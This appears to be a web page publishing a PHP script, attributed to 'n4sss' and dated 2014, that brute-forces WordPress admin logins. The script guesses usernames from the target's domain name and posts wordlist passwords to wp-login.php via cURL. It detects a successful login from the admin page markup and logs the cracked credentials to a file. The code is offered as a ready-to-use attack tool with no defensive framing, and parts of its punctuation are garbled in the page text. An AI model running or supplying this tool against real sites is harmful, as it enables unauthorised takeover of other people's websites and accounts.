facebook facebook twitter rss

Simple Wp BruteForce using usergen

Author: n4sss , Published: 13-06-2014

<?php


/*
* Simple Wp BruteForce using usergen
*
* Current users to test (http://sitexample.com)
* -> admin
* -> siteexample
* -> siteexam (substr 8)
*
* php wpBrute.php http://uri wordlist
*
* By n4sss
* Contact: n-l4b[at]hotmail[dot]com
* http://janissaries.org
*
**/

set_time_limit(0);
error_reporting(0);

Class 
WpBrute{

var 
$httpResponse null;
var 
$log null;
var 
$timeout null;
var 
$cookieContainer null;
var 
$uri null;
var 
$fullPath null;
var 
$wordlist null;
var 
$users null;

function 
__construct($uri$wordlist){
$this->uri $uri;
$this->log 'ok_wp.txt';
$this->wordlist $wordlist;
$this->timeout 8;
$this->start();
}

function 
__destruct(){
if(
file_exists($this->cookieContainer)){
unlink($this->cookieContainer);
}
printf("\nFinished\n");
}

function 
save_content($file$content){
$fp fopen($file"a+");
fwrite($fp$content."\r\n");
fclose($fp);
}

function 
usergen(){
if(
preg_match("/http|www./"$this->uri)) $this->uri str_replace(array("http://""www."), ""$this->uri);
$toParse $this->uri;
if(
strstr($toParse'/')) $toParse substr($toParse0strpos($toParse'/'));
$pass explode("."$toParse);
$upass substr($pass[0], 08);
$this->cookieContainer $pass[0].".cookie";
$this->wordlist[] = $pass[0];
$this->wordlist[] = $upass;
$this->users = array('admin'$pass[0], $upass);
}

function 
post(){
$this->fullPath 'http://'.$this->uri.'/wp-login.php';
$msg '';
foreach(
$this->users as $user){
foreach(
$this->wordlist as $password){
$postContent "log={$user}&pwd={$password}&wp-submit=Log In&redirect_to=http://{$this->uri}/wp-admin/&testcookie=1";
$ch curl_init();
curl_setopt($chCURLOPT_URL$this->fullPath);
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_COOKIEJAR$this->cookieContainer);
curl_setopt($chCURLOPT_COOKIEFILE$this->cookieContainer);
curl_setopt($chCURLOPT_TIMEOUT$this->timeout);
curl_setopt($chCURLOPT_CONNECTTIMEOUT$this->timeout);
curl_setopt($chCURLOPT_HEADER1);
curl_setopt($chCURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS$postContent);
$this->httpResponse curl_exec($ch);
if(
preg_match("/adminmenuback|Comments/"$this->httpResponse)){
$msg sprintf("[+][OK] %s %s:%s\n"$this->fullPath$user$password);
print 
$msg;
@
file_put_contents($this->log$msgFILE_APPEND);
exit(
0);
}else{
$msg sprintf("[-] %s:%s\n"$user$password);
print 
$msg;
}
}
}
}

function 
start(){
printf("wp brute by n4sss\n\n[Uri] %s\n[Wordlist] %s\n\nWait the brute!\n"$this->uri$this->wordlist);
sleep(5);
$this->wordlist array_filter(explode("\n"file_get_contents($this->wordlist)));
$this->usergen();
$this->post();
}
}

if(isset(
$argv[1],$argv[2])){
$wpBrute = new WpBrute(trim($argv[1]), trim($argv[2]));
}else{
printf("php %s http://uri wordlist\n"$argv[0]);
exit(
0);
}


?>

Like us on Facebook :